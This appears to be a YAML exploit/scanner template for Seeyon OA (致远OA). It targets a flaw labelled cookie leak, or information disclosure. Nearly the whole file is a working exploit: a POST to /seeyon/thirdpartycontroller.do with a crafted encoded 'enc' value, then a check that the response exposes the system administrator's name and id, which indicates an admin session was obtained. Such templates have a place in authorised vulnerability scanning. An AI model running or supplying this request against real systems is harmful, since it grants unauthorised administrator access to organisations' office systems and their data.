product: 致远OA
vName: 致远OA Cookie泄露
type: 信息泄露
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /seeyon/thirdpartycontroller.do
      data: method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - /seeyon/common/
            logic: and
  - exp:
      method: get
      follow: false
      path: /seeyon/main.do?method=headerjs
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"name":"系统管理员'
              - '"id":"-7273032013234748168'
            logic: and